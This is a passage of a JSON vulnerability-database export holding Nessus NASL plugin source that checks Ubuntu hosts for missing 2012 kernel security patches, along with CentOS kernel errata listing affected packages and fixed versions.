\"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1577-1\");\n\n script_name(english:\"USN-1577-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"A flaw was discovered in the Linux kernel's KVM (kernel virtual\nmachine). An administrative user in the guest OS could leverage this\nflaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1577-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-1209-omap4\", pkgver:\"2.6.38-1209.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:38", "references": ["http://www.ubuntu.com/usn/usn-1580-1/"], "pluginID": "62241", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "edition": 5, "reporter": "Tenable", "published": "2012-09-24T00:00:00", "title": "USN-1580-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2016-12-01T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux"], "id": "UBUNTU_USN-1580-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62241", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1580-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62241);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_xref(name:\"USN\", value:\"1580-1\");\n\n script_name(english:\"USN-1580-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1580-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-1419-omap4\", pkgver:\"3.2.0-1419.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:39:29", "references": [], "pluginID": "62112", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-15T00:00:00", "title": "Ubuntu 11.10 : linux vulnerabilities (USN-1568-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-01T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server"], "id": "UBUNTU_USN-1568-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1568-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62112);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1568-1\");\n\n script_name(english:\"Ubuntu 11.10 : linux vulnerabilities (USN-1568-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-generic\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-generic-pae\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-server\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-virtual\", pkgver:\"3.0.0-26.42\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:33", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1323.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.18-308.16.1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:1323\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\n* A use-after-free flaw was found in the xacct_add_tsk() function in the\nLinux kernel's taskstats subsystem. A local, unprivileged user could use\nthis flaw to cause an information leak or a denial of service.\n(CVE-2012-3510, Moderate)\n\n* A buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS Plus (HFS+) file system implementation in the Linux kernel. A local\nuser able to mount a specially-crafted HFS+ file system image could use\nthis flaw to cause a denial of service or escalate their privileges.\n(CVE-2012-2319, Low)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412, and Alexander Peslyak for reporting CVE-2012-3510. The\nCVE-2012-3430 issue was discovered by the Red Hat InfiniBand team.\n\nThis update also fixes the following bugs:\n\n* The cpuid_whitelist() function, masking the Enhanced Intel SpeedStep\n(EST) flag from all guests, prevented the \"cpuspeed\" service from working\nin the privileged Xen domain (dom0). CPU scaling was therefore not\npossible. With this update, cpuid_whitelist() is aware whether the domain\nexecuting CPUID is privileged or not, and enables the EST flag for dom0.\n(BZ#846125)\n\n* If a delayed-allocation write was performed before quota was enabled,\nthe kernel displayed the following warning message:\n\n WARNING: at fs/quota/dquot.c:988 dquot_claim_space+0x77/0x112()\n\nThis was because information about the delayed allocation was not recorded\nin the quota structure. With this update, writes prior to enabling quota\nare properly accounted for, and the message is not displayed. (BZ#847326)\n\n* In Red Hat Enterprise Linux 5.9, the DSCP (Differentiated Services Code\nPoint) netfilter module now supports mangling of the DSCP field.\n(BZ#847327)\n\n* Some subsystems clear the TIF_SIGPENDING flag during error handling in\nfork() paths. Previously, if the flag was cleared, the ERESTARTNOINTR error\ncode could be returned. The underlying source code has been modified so\nthat the error code is no longer returned. (BZ#847359)\n\n* An unnecessary check for the RXCW.CW bit could cause the Intel e1000e NIC\n(Network Interface Controller) to not work properly. The check has been\nremoved so that the Intel e1000e NIC works as expected. (BZ#852448)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-October/018911.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1323.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-10-03T07:39:10", "title": "kernel security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2319", "CVE-2012-3510", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-10-03T07:39:10", "href": "http://lists.centos.org/pipermail/centos-announce/2012-October/018911.html", "id": "CESA-2012:1323", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:16", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1366.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "python-perf-2.6.32-279.11.1.el6.i686.rpm", "packageName": "python-perf", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-debug", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-headers", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "python-perf-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "python-perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-doc-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-doc-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-2.6.32-279.11.1.el6.src.rpm", "packageName": "kernel", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "perf-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "packageFilename": "perf-2.6.32-279.11.1.el6.i686.rpm", "packageName": "perf", "arch": "i686", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:1366\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct this issue, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-October/018944.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1366.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-10-16T17:34:31", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "kernel, perf, python security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "modified": "2012-10-16T17:34:31", "href": "http://lists.centos.org/pipermail/centos-announce/2012-October/018944.html", "id": "CESA-2012:1366", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:19", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1064.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-doc-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-doc-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "python-perf-2.6.32-279.1.1.el6.i686.rpm", "packageName": "python-perf", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-headers", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "perf-2.6.32-279.1.1.el6.i686.rpm", "packageName": "perf", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", 